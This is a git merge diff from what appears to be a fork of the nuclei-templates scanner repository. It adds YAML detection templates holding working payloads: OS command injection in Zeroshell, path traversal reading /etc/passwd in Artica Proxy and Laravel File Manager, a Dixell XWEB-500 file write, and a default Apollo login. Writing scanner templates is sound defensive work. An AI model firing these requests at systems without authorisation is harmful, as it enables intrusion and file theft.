Merge branch 'projectdiscovery:master' into dashboard
commit
0f3ffc7e0a
|
@ -1,15 +1,21 @@
|
|||
cves/2017/CVE-2017-9833.yaml
|
||||
cves/2020/CVE-2020-13158.yaml
|
||||
cves/2020/CVE-2020-15050.yaml
|
||||
cves/2020/CVE-2020-7943.yaml
|
||||
cves/2021/CVE-2021-3002.yaml
|
||||
cves/2022/CVE-2022-0381.yaml
|
||||
cves/2022/CVE-2022-23779.yaml
|
||||
cves/2022/CVE-2022-24990.yaml
|
||||
default-logins/apollo/apollo-default-login.yaml
|
||||
default-logins/digitalrebar/digitalrebar-default-login.yaml
|
||||
dns/caa-fingerprint.yaml
|
||||
exposed-panels/kentico-login.yaml
|
||||
exposed-panels/laravel-filemanager.yaml
|
||||
exposed-panels/matomo-login-portal.yaml
|
||||
exposed-panels/puppetboard-panel.yaml
|
||||
exposed-panels/xweb500-panel.yaml
|
||||
technologies/puppetdb-detect.yaml
|
||||
technologies/puppetserver-detect.yaml
|
||||
vulnerabilities/other/dixell-xweb500-filewrite.yaml
|
||||
vulnerabilities/other/laravel-filemanager-lfi.yaml
|
||||
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2019-12725
|
|||
|
||||
info:
|
||||
name: Zeroshell 3.9.0 Remote Command Execution
|
||||
author: dwisiswant0
|
||||
author: dwisiswant0,akincibor
|
||||
severity: critical
|
||||
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
|
||||
remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
|
||||
|
@ -20,14 +20,17 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22id%22%0A%27"
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}[a-z0-9]+"
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/02/04
|
||||
|
|
|
@ -0,0 +1,31 @@
|
|||
id: CVE-2020-13158
|
||||
info:
|
||||
name: Artica Proxy before 4.30.000000 Community Edition - Directory Traversal
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
description: Artica Proxy before 4.30.000000 Community Edition allows Directory Traversal via the fw.progrss.details.php popup parameter.
|
||||
reference:
|
||||
- https://github.com/InfoSec4Fun/CVE-2020-13158
|
||||
- https://sourceforge.net/projects/artica-squid/files/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-13158
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-13158
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2020,artica,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw.progrss.details.php?popup=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -3,12 +3,17 @@ id: CVE-2021-3654
|
|||
info:
|
||||
name: noVNC Open Redirect
|
||||
author: geeknik
|
||||
severity: low
|
||||
severity: medium
|
||||
description: A user-controlled input redirects noVNC users to an external website.
|
||||
reference:
|
||||
- https://seclists.org/oss-sec/2021/q3/188
|
||||
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3654
|
||||
tags: redirect,novnc,cve,cve2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2021-3654
|
||||
cwe-id: CWE-601
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -0,0 +1,46 @@
|
|||
id: apollo-default-login
|
||||
|
||||
info:
|
||||
name: Apollo Default Login
|
||||
author: PaperPen
|
||||
severity: high
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:11794165
|
||||
reference: https://github.com/apolloconfig/apollo
|
||||
tags: apollo,default-login
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /signin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Origin: {{BaseURL}}
|
||||
Referer: {{BaseURL}}/signin?
|
||||
|
||||
username={{user}}&password={{pass}}&login-submit=Login
|
||||
|
||||
- |
|
||||
GET /user HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
user:
|
||||
- apollo
|
||||
pass:
|
||||
- admin
|
||||
|
||||
cookie-reuse: true
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- '"userId":'
|
||||
- '"email":'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: axigen-webmail
|
|||
|
||||
info:
|
||||
name: Axigen WebMail
|
||||
author: dhiyaneshDk
|
||||
author: dhiyaneshDk,idealphase
|
||||
severity: info
|
||||
description: This template determines if Axigen Webmail is running.
|
||||
reference:
|
||||
|
@ -18,12 +18,19 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Axigen WebMail</title>'
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?i)(Axigen WebMail)'
|
||||
- '<title>Axigen Standard Webmail - (.*)</title>'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by cs on 2022/02/25
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
part: body
|
||||
regex:
|
||||
- '<script type="text\/javascript" src="js\/lib_login\.js\?v=(.+)"><\/script>'
|
||||
|
|
|
@ -2,7 +2,7 @@ id: kibana-panel
|
|||
|
||||
info:
|
||||
name: Kibana Panel Login
|
||||
author: petruknisme,daffainfo
|
||||
author: petruknisme,daffainfo,c-sh0
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.title:"Kibana"
|
||||
|
@ -11,16 +11,24 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
- "{{BaseURL}}/login"
|
||||
- "{{BaseURL}}/app/kibana"
|
||||
|
||||
stop-at-first-match: true
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Kibana</title>"
|
||||
- "<title>Elastic</title>"
|
||||
- "<title>Kibana Login</title>"
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
- type: regex
|
||||
part: header
|
||||
words:
|
||||
- "Kbn-Name:"
|
||||
regex:
|
||||
- '(?i)(Kbn-Name)'
|
||||
|
|
|
@ -0,0 +1,24 @@
|
|||
id: laravel-filemanager
|
||||
|
||||
info:
|
||||
name: Laravel FileManager Panel Detect
|
||||
author: princechaddha
|
||||
severity: info
|
||||
reference: https://github.com/UniSharp/laravel-filemanager
|
||||
tags: laravel,filemanager,fileupload
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/laravel-filemanager?type=Files"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Laravel FileManager"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: xweb500-panel
|
||||
|
||||
info:
|
||||
name: Xweb500 Login Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
google-dork: inurl:"xweb500.cgi"
|
||||
tags: panel,xweb500
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/xweb500.cgi"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>Xweb500</title>"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -21,10 +21,15 @@ requests:
|
|||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/octet-stream"
|
||||
part: header
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'len(body) > 2'
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "!contains(tolower(body), '<html')"
|
||||
- "!contains(tolower(body), '<body')"
|
||||
|
|
|
@ -0,0 +1,35 @@
|
|||
id: dixell-xweb500-filewrite
|
||||
|
||||
info:
|
||||
name: Dixell XWEB-500 - Arbitrary File Write
|
||||
author: hackerarpan
|
||||
severity: critical
|
||||
reference: https://www.exploit-db.com/exploits/50639
|
||||
metadata:
|
||||
google-dork: inurl:"xweb500.cgi"
|
||||
tags: lfw,iot,dixell,xweb500
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
{{randstr}}.txt
|
||||
dixell-xweb500-filewrite
|
||||
|
||||
- |
|
||||
GET /logo/{{randstr}}.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_2, "dixell-xweb500-filewrite")'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: laravel-filemanager-lfi
|
||||
info:
|
||||
name: UniSharp Laravel File Manager 2.0.0 - Arbitrary File Read
|
||||
author: hackerarpan
|
||||
severity: high
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48166
|
||||
- https://github.com/UniSharp/laravel-filemanager
|
||||
metadata:
|
||||
google-dork: inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
|
||||
shodan-query: http.html:"Laravel FileManager"
|
||||
tags: lfi,unisharp,laravel,filemanager,fileupload,lfr
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue